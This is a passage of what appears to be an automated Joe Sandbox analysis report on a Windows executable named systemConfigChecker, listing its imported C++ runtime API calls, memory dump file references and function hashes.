              APIs
              • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z.MSVCP140 ref: 00007FF64E139BE5
              • ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z.MSVCP140 ref: 00007FF64E139BF1
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF64E139BFA
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: D@std@@@std@@U?$char_traits@V12@$?flush@?$basic_ostream@_?put@?$basic_ostream@?widen@?$basic_ios@U?$char_traits@_W@std@@@std@@
              • String ID:
              • API String ID: 2670548386-0
              • Opcode ID: a91e5c45519eb8f51b08b89dc2630a913814ba17e6fe4b3f6d8b063faadf772a
              • Instruction ID: 8a79d0886eef22f21319f846b75a03e878f1e0fa71ec8d2a76b892c2f3b40133
              • Opcode Fuzzy Hash: a91e5c45519eb8f51b08b89dc2630a913814ba17e6fe4b3f6d8b063faadf772a
              • Instruction Fuzzy Hash: CAD01231A8870681EE087F16B8941341310AF99F41B085431ED0F47311CE3CD0558600
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: _fseeki64fgetpos
              • String ID:
              • API String ID: 3401907645-0
              • Opcode ID: 84d1aada89cd4f08e3bbf216dfcb77ee72de2ef28ea993f6e0146b415928d795
              • Instruction ID: ccb4e0b20fc77b56df6e507300e726995c76277d870803274842c245e2fb0b86
              • Opcode Fuzzy Hash: 84d1aada89cd4f08e3bbf216dfcb77ee72de2ef28ea993f6e0146b415928d795
              • Instruction Fuzzy Hash: 39314172648B4181FB60AF1AD55036873A0FB69F98F548531DE5DC7BA4DF38D4A6C700
              APIs
              • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF64E131A88), ref: 00007FF64E1375C6
              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF64E131A88), ref: 00007FF64E1375D7
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: D@std@@@std@@Init@?$basic_streambuf@U?$char_traits@fclose
              • String ID:
              • API String ID: 356833432-0
              • Opcode ID: baf789e10b114cee5e0dc2a749248d1481134e019c89cdd30f75a30e5dac250a
              • Instruction ID: 00d1cd742196769214e9069578e934af75660c567d59ed8cf952d618f8ce4530
              • Opcode Fuzzy Hash: baf789e10b114cee5e0dc2a749248d1481134e019c89cdd30f75a30e5dac250a
              • Instruction Fuzzy Hash: 2A213872A49B8184EB45AF39E4543A837A4FB58F48F048036EE5D87768DF39C489CB10
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: memcpy
              • String ID:
              • API String ID: 3510742995-0
              • Opcode ID: 149e98f966ca39f545501bcc588d275b7c10951c67578fb38073e5381dc08cba
              • Instruction ID: 257c414c2a838eceea4994e7057bd9fff411fea0c512cc7ac72077a94cbdac5b
              • Opcode Fuzzy Hash: 149e98f966ca39f545501bcc588d275b7c10951c67578fb38073e5381dc08cba
              • Instruction Fuzzy Hash: BF019E72B08B9481EA00AF1AF20016EA371F798FC8B148532EF5C57F59DF38D5A28740
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: memcpy
              • String ID:
              • API String ID: 3510742995-0
              • Opcode ID: 5dc8fa1c5b248780a8537c25d0c0cf88b713966feb18ba42258b0d7c8ad9e6c7
              • Instruction ID: cc8b1e817f7e7ce9819f639eb573a64e7a87c17e93a4a75daaf93cc0aa15180c
              • Opcode Fuzzy Hash: 5dc8fa1c5b248780a8537c25d0c0cf88b713966feb18ba42258b0d7c8ad9e6c7
              • Instruction Fuzzy Hash: 6101A262B08B9481EA00AB1AF6000ADA760F795FC4F144532EF6C17F59DF3DD5A28700
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
              • String ID:
              • API String ID: 313767242-0
              • Opcode ID: b33f0b59232ef77628a0e21157c01a396e23f4d8de78da469aa8954c23b2d4cb
              • Instruction ID: ceb5893088a189df6ac6ab094ec0b6563926f6a6688cc87763763ed6c0ec012d
              • Opcode Fuzzy Hash: b33f0b59232ef77628a0e21157c01a396e23f4d8de78da469aa8954c23b2d4cb
              • Instruction Fuzzy Hash: E1315E76748B8186FB60AF60E8807ED7364FB94744F04443AEA4E87B99EF38D548CB10
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
              • String ID:
              • API String ID: 2933794660-0
              • Opcode ID: 26322efcc4006b2a3fbf51e2f5d46ec533835fa6bb93ff54a7596d062d660e14
              • Instruction ID: 11998fca3748c2161dbeb5d281024072b1ae85f824e047a96895faef74579ec6
              • Opcode Fuzzy Hash: 26322efcc4006b2a3fbf51e2f5d46ec533835fa6bb93ff54a7596d062d660e14
              • Instruction Fuzzy Hash: 5E111C36B58B018AFB00AB60E8552A833A4FB69758F441E31EA6D87BA4DF7CD1548780
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7219aed77cf3d566d0c56852d0d3a0fd15ec5d75e91c4be2dfb621eecc1fe0a9
              • Instruction ID: aade1102d9846a9a8d0d43f505453e88917f5bc7cdfa887398fe15f73d82c62f
              • Opcode Fuzzy Hash: 7219aed77cf3d566d0c56852d0d3a0fd15ec5d75e91c4be2dfb621eecc1fe0a9
              • Instruction Fuzzy Hash: 13A00231A8CE46D0F644BB00E9902352330FBB0750B404471F40EC38A19F3CA430DB14
              APIs
              • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E13157F
              • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF64E13159E
              • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF64E1315D2
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z@Z.MSVCP140 ref: 00007FF64E131609
              • isalnum.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF64E131648
              • ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140 ref: 00007FF64E13166D
              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF64E13169B
              • ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E131782
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF64E13178C
                • Part of subcall function 00007FF64E139820: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF64E13986D
                • Part of subcall function 00007FF64E139820: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF64E13988D
                • Part of subcall function 00007FF64E139820: ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF64E13989D
                • Part of subcall function 00007FF64E139820: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF64E1398FD
                • Part of subcall function 00007FF64E139820: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF64E139926
                • Part of subcall function 00007FF64E139820: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF64E13995D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: U?$char_traits@$D@std@@@std@@$?sputc@?$basic_streambuf@$??6?$basic_ostream@?good@ios_base@std@@V01@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@?flush@?$basic_ostream@_?setw@std@@D@std@@@1@_J@1@_Smanip@_U?$_U?$char_traits@_V12@V21@@V?$basic_streambuf@Vios_base@1@W@std@@@std@@isalnum
              • String ID: _$~
              • API String ID: 2365617078-3740536066
              • Opcode ID: 8f68b8c8258da5cd91e34a757c6f19a2daf3b84494c5e989e5e3b3f3a5cd17a5
              • Instruction ID: caad51ba7854ac159ad18da959d9edd5bb158493baae680dca0e13b54b1eac60
              • Opcode Fuzzy Hash: 8f68b8c8258da5cd91e34a757c6f19a2daf3b84494c5e989e5e3b3f3a5cd17a5
              • Instruction Fuzzy Hash: C5717D72B4CB8186FB10EF55E4902AAA760FB94B88F548132EE4D93A69DF7CD445CB00
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn$memcpy$?out@?$codecvt@Mbstatet@@Mbstatet@@@std@@
              • String ID:
              • API String ID: 4130688501-0
              • Opcode ID: 73b376faba5fd1c577b732dcb95b495d3598767e36325b8f72f8f8c314cf383d
              • Instruction ID: 541d56d9cfce0f68860ded66c58cd6f23e8f2f007f959486b558832076acec0e
              • Opcode Fuzzy Hash: 73b376faba5fd1c577b732dcb95b495d3598767e36325b8f72f8f8c314cf383d
              • Instruction Fuzzy Hash: B3D18E62F5DB4185FB10FB64E4403BC2265EB69BA8F404232EA6D97FD9DE3CE4858700
              APIs
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF64E13986D
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF64E13988D
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF64E13989D
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF64E1398FD
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF64E139926
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF64E13995D
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF64E1399A1
              • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF64E1399A8
              • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF64E1399B5
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: ?sputc@?$basic_streambuf@D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
              • String ID:
              • API String ID: 569342377-0
              • Opcode ID: 37b8ee53cb8b00479985113fba4434682f5c23c40aa0f0a0174690d29aea351c
              • Instruction ID: c753ae3b9d0ed48f620c2268f4f83585e195bf8cfb80d79c17afd14f76afd70c
              • Opcode Fuzzy Hash: 37b8ee53cb8b00479985113fba4434682f5c23c40aa0f0a0174690d29aea351c
              • Instruction Fuzzy Hash: 1851703264DB8186FB10AF19D5D023CA7A0FB94B95B158532DE5E87FA4CF39D856CB00
              APIs
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF64E13B2B5
              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF64E13B2D5
              • ?good@ios_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF64E13B2E5
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF64E13B32C
              • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF64E13B359
              • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF64E13B37A
              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF64E13B3C0
              • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF64E13B3C7
              • ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF64E13B3D4
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: D@std@@@std@@U?$char_traits@U?$char_traits@_W@std@@@std@@$?good@ios_base@std@@?sputc@?$basic_streambuf@$?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@_V12@
              • String ID:
              • API String ID: 1135186806-0
              • Opcode ID: b45920d080d8d4678659f56451c6e88468ea0ecd66730601f2742ce8c786c4e1
              • Instruction ID: 4bdacf9aad6d09ba34efcd1ffdabb49a7ac1680236a1c02daa33b7418cd9603b
              • Opcode Fuzzy Hash: b45920d080d8d4678659f56451c6e88468ea0ecd66730601f2742ce8c786c4e1
              • Instruction Fuzzy Hash: F151223264CA5181FB20BF1AD5D0A3DA7A0FF95F95B158531EE4E83B60DE3DD8468B00
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$?in@?$codecvt@Mbstatet@@Mbstatet@@@std@@memcpy
              • String ID:
              • API String ID: 281699261-0
              • Opcode ID: 9d65bfed7838d7cd01c189297b92ca64ffbdaea2cba263f34434c41371c6b8aa
              • Instruction ID: 0303233061263a2c4fb4321198895833010a04b6bb5e3dfe48e8dafc0a130e96
              • Opcode Fuzzy Hash: 9d65bfed7838d7cd01c189297b92ca64ffbdaea2cba263f34434c41371c6b8aa
              • Instruction Fuzzy Hash: 95B19EA2F5CA8595FB10FB68D4842AD7362EB68798F404632EA5D93FD8EF38D144C740
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: fgetc
              • String ID:
              • API String ID: 2807381905-0
              • Opcode ID: 64994607539f38f552e42247ef51bee8c107110e09ecd35cad0c016812c1fa46
              • Instruction ID: ae8ac8844f7382cecf81cd7574591e70819ac1a499a76c8837b127f88b56c598
              • Opcode Fuzzy Hash: 64994607539f38f552e42247ef51bee8c107110e09ecd35cad0c016812c1fa46
              • Instruction Fuzzy Hash: 02818833B18B8199FB10AF65C4802AD37B4FB58B68F541632EA6D93B95DF38D494C740
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
              • String ID:
              • API String ID: 1775671525-0
              • Opcode ID: ec63268d6026fec8c3c01620d9734fc28b0be693d76d74db511f0e55b27b6a49
              • Instruction ID: d100d32f668154aff448f03eaff6972f7516ebf7237ee1e6c6c16c745161f8d3
              • Opcode Fuzzy Hash: ec63268d6026fec8c3c01620d9734fc28b0be693d76d74db511f0e55b27b6a49
              • Instruction Fuzzy Hash: 8351BF62A0CB8181FA10FF21D1046AD63A4FB65BD8F144632EF6C97B92DF38E595D780
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
              • String ID:
              • API String ID: 1155477157-0
              • Opcode ID: 2b8c79cdb3266eb39cf5aa1dd2f2519663dc420ae3e69cc0fff0188470da729c
              • Instruction ID: ea601a47d1097f43c982e951dc6c397b97ad2bd1d2d3b55abc9bdc7c094ee3e5
              • Opcode Fuzzy Hash: 2b8c79cdb3266eb39cf5aa1dd2f2519663dc420ae3e69cc0fff0188470da729c
              • Instruction Fuzzy Hash: 8751AE62F48B8191FA10BF25D4042AC23A0FB65BA4F544B36EEAD93BC5DF38E595C740
              APIs
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF64E138E38), ref: 00007FF64E138580
                • Part of subcall function 00007FF64E13B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF64E13107B), ref: 00007FF64E13B522
                • Part of subcall function 00007FF64E131310: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF64E13131B
              • memcpy.VCRUNTIME140(?,?,?,00007FF64E138E38), ref: 00007FF64E1385A1
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF64E1385BC
                • Part of subcall function 00007FF64E131270: __std_exception_copy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF64E13B543), ref: 00007FF64E1312B4
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF64E138E38), ref: 00007FF64E138625
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF64E138E38), ref: 00007FF64E13862E
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff64e130000_systemConfigChecker.jbxd
              Similarity
              • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_iostream@Concurrency::cancel_current_taskXlength_error@std@@__std_exception_copy_invalid_parameter_noinfo_noreturnmallocmemcpy
              • String ID:
              • API String ID: 2733788171-0
              • Opcode ID: 895c6813316c641382c5e3aa4b1084326639795824eb79dcb369539a11281871
              • Instruction ID: f982af1d68aa9578e34ac74bd9487f9680c13e73828a809f1d623204852d2dec
              • Opcode Fuzzy Hash: 895c6813316c641382c5e3aa4b1084326639795824eb79dcb369539a11281871
              • Instruction Fuzzy Hash: 0B41B572B49B4285FB54BB25E4403B823A0EB64BA4F148735EB6D43FD6DE38D8D58B00
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2342658416.00007FF64E131000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF64E130000, based on PE: true
              • Associated: 00000000.00000002.2342642335.00007FF64E130000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342709444.00007FF64E13E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342733213.00007FF64E145000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2342765293.00007FF64E146000.00000002.00000001.01000000.00000003.sdmpDownload File
